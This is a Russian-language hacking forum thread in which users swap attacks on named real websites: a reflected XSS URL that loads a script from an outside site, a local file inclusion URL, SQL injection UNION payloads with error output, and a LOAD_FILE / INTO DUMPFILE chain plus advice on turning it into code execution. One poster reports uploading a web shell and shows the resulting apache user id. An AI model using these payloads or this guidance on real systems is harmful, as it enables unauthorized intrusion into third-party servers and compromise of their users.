все значит из за глупости моей , а можешь прям на этом примере показать как ее передать через адрес ? или POST так невыйдет
Не согласен,в данном случаии(http://ru.bigpoint.com/signup/) переменные принимаються через REQUEST(ну или регистр глобалс) скорее всего, потому как пассивка на лицо:
Pavlov, hex не поможет тут... Byrger, если ты и сможешь подделать IP, всеравно экранировка кавычки произойдет.
http://www.acumenin.com/index.php?p=../index.php Можно ли что нить придумать дальше? Не силен в инклюдах =(
Можно.... Например записать в сессию пхп код... далее инклудить его. Поискать возможности заливки файла для дальнейшего инклуда и тд. и тп.
Я вобще тут никакой сложности не вижу Code: http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script> прекрасно работает!
Всем здрасти... Есть скул При попытке проверить ее таким способом 10-1 (должна вывестить 9 новость) Выводится 10 новость... Значит наврятли можно чего сделать, при попытке подставить ковычку это лезет: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2,3,4,5,6,7,8--' and pd.products_id = ''+union+select+1,2,3,4,5,6' at line 1 Выплеск запроса(оставил важное токо):where p.products_id = ''+union+select+1,2,3,4,5,6--' and pd.products_id = ''+union+select+1,2,3,4,5,6--' and pd.language_id = '2' (1,2,3,4... мое, пробывал подобрать)(запрос был таким, id='+union+select+1,2,3,4,5,6--) При заменне плюсеков на пробелы вылазиет след. ошибка: 1109 - Unknown table 'pd' in field list (значит внедрение запроса по идее возможно) Как тут быть? Скул в локалке. Пробывал разные комменты (--,/*, -- ) но не помогает
какой сложности?для тех кто в танке: я писал о том почему алерт вылазит,и предположил что данные принимаются постом. но Пако капнул дальше и построив опрделеннный запрос опредилил что данные принимаются через REQUEST(ну или регистр глобалс).
nub-hacker Code: потом пытаюсь открыть http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9-- нифига не раб. помогите плиз. почему не работает, как раз всё прекрасно в папку tmp залилось, что можнно проверить, пройдя по твоей последней ссылке: Code: http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9-- посмотреть сорцы страницы, CTRL+F "<?", и ты увидишь там свой "<?phpinfo();?>" Просто сначала ты писал "читалка", а потом почему-то ждешь исполнения того, что загрузил. На самом деле через SQL-inj то, что загрузил - то просто сможешь также ПРОЧИТАТЬ. Чтобы файло, загруженное через скулю заработало, его (файло) надо загружать в папку, доступную из веба (т.е. чтобы можно было набрать к нему путь в адресной строке браузера), но для этого необходимы 2 условия: 1. Знать полный абсолютный путь к серверу (а не просто /tmp, которая просто является фактическим тестом рабочести load_file). Папка "/tmp"Не всегда бывает доступна на запись, что часто многих начинающих сбивает с толку и они бросают такие скули. 2. Папка должна быть доступна на запись ЗЫЖ Ну или как ты, в /tmp, но потом искать LFI, чтобы из этой /tmp проинклудить (читай - выполнить) твой phpinfo.php
:O мой пост и мою скуль крутишь 1)load_file - это чтение исходного кода файла 2)+into+DUMPFILE+'/tmp/phpinfo.php'-- что бы это использовать надо иметь тебе инклуд
Pashkela, спасибо огромное, что так подробно разяснил. буду искать путь в web. HAXTA4OK,спс за скулю. побольше бы рутовских
P.S. вот тока ща зашел в эту тему прочел послед ваши посты и уже залил туда шелл если не жалко то закройте тему с этой скулей P.S.S за 3 минуты мой рекорд нашел и путь и залил шелл uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:initrc_t права taM